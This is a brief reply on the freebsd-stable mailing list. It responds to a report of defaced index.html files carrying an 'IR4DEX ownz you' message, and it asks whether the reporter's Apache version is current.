-0000 Miha Nedok wrote: > Hi ! > > Today I have noticed some modified index.html files on some of our vhosts. > Is it Apache related ? Does anyone know about this ? > > The content is following: > IR4DEX ownz you FreeBSD - contato: ir4dex@hotmail.com Is your apache version update? Maybe IR4DEX knows more about it :) -- Marco Trentini mark@remotelab.org http://www.remotelab.org/ _______________________________________________ freebsd-stable@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-stable To unsubscribe, send any mail to "freebsd-stable-unsubscribe@freebsd.org"